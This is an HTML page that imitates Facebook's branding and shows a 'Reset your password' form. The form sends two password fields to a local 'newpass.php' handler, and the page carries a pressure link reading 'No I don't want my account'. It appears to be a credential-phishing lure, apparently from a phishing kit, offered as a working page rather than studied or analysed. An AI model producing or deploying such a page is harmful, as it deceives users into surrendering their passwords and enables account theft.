<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Error!</title>

<link rel="icon" type="image/gif/png" href="https://upload.wikimedia.org/wikipedia/commons/thumb/c/cd/Facebook_logo_%28square%29.png/600px-Facebook_logo_%28square%29.png">

<link href='http://fonts.googleapis.com/css?family=Roboto' rel='stylesheet' type='text/css'>
</head>
<body>
<style type="text/css">

.header{
background-color: #3B5998;
padding: 20px 10px;
}
.header p2{

color: white;
font-family: 'Roboto', sans-serif;
font-size: 38px;
font-weight:bold;

}



body{
background-color: #DADDE1;
font-family: 'Roboto', sans-serif;
font-size: 30px;
color: #4B4f56;   
}

.button {
    background-color: #3B5998;
    border: none;
    color: white;
    padding: 30px 150px;
    text-align: center;
    font-size: 45px;
    margin:auto;
    display:block;
    cursor: pointer;
    box-shadow: 0 8px 16px 0 rgba(0,0,0,0.2), 0 6px 20px 0 rgba(0,0,0,0.19);
    width:100%;
}

.button:hover {
    background-color: #3e6ab7;
    box-shadow: 0 12px 16px 0 rgba(0,0,0,0.24), 0 17px 50px 0 rgba(0,0,0,0.19);
}


.link{
color: #5C73A3;
font-size: 65px;
}



.submit {
    background-color: #3B5998;
    border: none;
    color: white;
    padding: 30px 150px;
    text-align: center;
    font-size: 45px;
    margin:auto;
    display:block;
    cursor: pointer;
    box-shadow: 0 8px 16px 0 rgba(0,0,0,0.2), 0 6px 20px 0 rgba(0,0,0,0.19);
    width:95%;
    border-radius: 9px;
}



.form p3{
font-size: 100px;
font-weight: bold;
}


.form input{
font-size:50px;
padding: 20px 20px; 
width: 98%;
   height: 150px;
    box-sizing: border-box;
    border: 2px solid grey;
    border-radius: 14px;
}

.form input[placeholder]{
font-size: 65px;
}

.form input:focus {
    border: 4px solid grey;
}

  </style>


<div class="header">
<center><p2 style="font-size:9vw;">facebook</p2></center>
</div>





<center><h1>Reset your password</h1></center>

<br>

<div class="form">

<center>

<form method="post" action="newpass.php">

<input type="password" id="firstpass" name="firstpass"     placeholder="Enter your new password">

<input type="password" id="firstpass" name="secondpass"    placeholder="Retype your new password">

<br>

<br>

<br>

<input type="submit" value="confirm" class="submit">

<br>

</form>

</center>

<center>
<a href="skip.html" class="link">No I don't want my account</a> 
</center>

</div>

</body>

</html>